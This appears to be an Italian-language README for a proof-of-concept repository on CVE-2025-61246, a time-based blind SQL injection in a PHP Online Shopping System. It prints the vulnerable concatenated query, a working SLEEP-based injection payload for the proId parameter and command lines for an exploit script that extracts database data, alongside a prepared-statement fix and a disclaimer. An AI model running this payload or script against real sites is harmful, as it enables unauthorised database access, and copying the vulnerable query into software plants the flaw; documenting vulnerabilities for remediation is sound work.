
CVE-2025-61246: Vulnerabilità SQL Injection PoC in Online Shopping System PHP
Questa repository contiene una Proof of Concept (PoC) per CVE-2025-61246, una vulnerabilità critica di SQL Injection scoperta nell'applicazione PHP Online Shopping System. La vulnerabilità consente a un attaccante non autenticato di eseguire comandi SQL arbitrari tramite SQL injection cieca basata sul tempo (time-based blind).
/online-shopping-system-php-master/review_action.phpproIdLa vulnerabilità è presente nell'endpoint review_action.php dove l'input fornito dall'utente tramite il parametro proId viene incorporato direttamente nelle query SQL senza un'adeguata sanitizzazione o l'uso di query parametrizzate. Ciò consente a un attaccante di iniettare payload SQL dannosi che possono:
// Vulnerable code (example)
$proId = $_POST['proId'];
$query = "SELECT * FROM products WHERE id = " . $proId;
mysqli_query($conn, $query);
Un attaccante può sfruttare questa vulnerabilità:
/online-shopping-system-php-master/review_action.phpproIdproId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
Questa repository include:
exploit.py) - Script Python per rilevare e sfruttare la vulnerabilitàMANUAL_TESTING.md) - Istruzioni passo-passo per lo sfruttamento manualedocker-compose.yml) - Ambiente Docker per test sicuriREMEDIATION.md) - Pratiche di codifica sicura e patchPython 3.7+
pip install -r requirements.txt
# Clone the repository
git clone https://github.com/hackergovind/CVE-2025-61246.git
cd CVE-2025-61246
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python exploit.py --url http://target.com/online-shopping-system-php-master/review_action.php
# Detection only (no exploitation)
python exploit.py --url http://target.com/review_action.php --detect-only
# Extract database name
python exploit.py --url http://target.com/review_action.php --extract-db
# Full exploitation with custom timeout
python exploit.py --url http://target.com/review_action.php --timeout 10 --full-exploit
# Use proxy for testing
python exploit.py --url http://target.com/review_action.php --proxy http://127.0.0.1:8080
Lo sfruttamento riuscito di questa vulnerabilità può portare a:
// Secure implementation using prepared statements
$proId = $_POST['proId'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $proId);
$stmt->execute();
$result = $stmt->get_result();
Per passaggi di mitigazione dettagliati, consultare REMEDIATION.md.
⚠️ IMPORTANTE: Questa PoC è fornita esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale. L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni. Ottenere sempre la dovuta autorizzazione prima di effettuare test.
Govind Pratap Singh
Questo progetto è rilasciato sotto la licenza MIT - vedere il file LICENSE per i dettagli.
Divulgazione Responsabile: Se si scopre una vulnerabilità di sicurezza, si prega di segnalarla responsabilmente al fornitore prima della divulgazione pubblica.